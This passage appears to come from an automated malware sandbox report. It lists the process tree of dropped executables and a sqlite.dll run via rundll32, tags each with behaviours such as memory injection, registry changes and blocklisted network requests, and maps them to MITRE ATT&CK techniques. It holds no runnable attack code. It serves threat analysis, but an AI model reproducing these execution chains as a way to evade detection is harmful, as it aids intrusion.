      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16400
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11388
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:15816
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10428
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16756
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:12300
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11168
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8988
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:14588
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:15736
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1312
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4240
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17364
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1732
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8320
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11060
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:15816
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10632
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:15080
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:14776
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17272
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9484
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16536
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16900
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16844
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16964
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16556
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:16912
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9416
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6924
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1224
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17416
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17540
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17628
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17708
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:17736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3568
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11bc0507b56295.exe
        
        Tue11bc0507b56295.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2112

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
PID:2064
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:5448

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
- Modifies registry class
PID:3016

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5312

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7136
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  PID:7152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5648

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6652

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4748
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7A4C8061E2F892AD72AFDCC4D4BECC79 C
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:4768
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 80247DE8696103C0B3D3EA6613067C2E
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4692
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:7292
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 52F8157806AEE54DF5C6728710CD1642 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:4572

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7492
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:7512

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:7920

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7820

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6680

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6092

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:10976

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:11032

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:11256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:10292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:11616

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:13144

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:13040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:14560

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:15104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:16076

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:16816

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:1844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:17228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:15528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery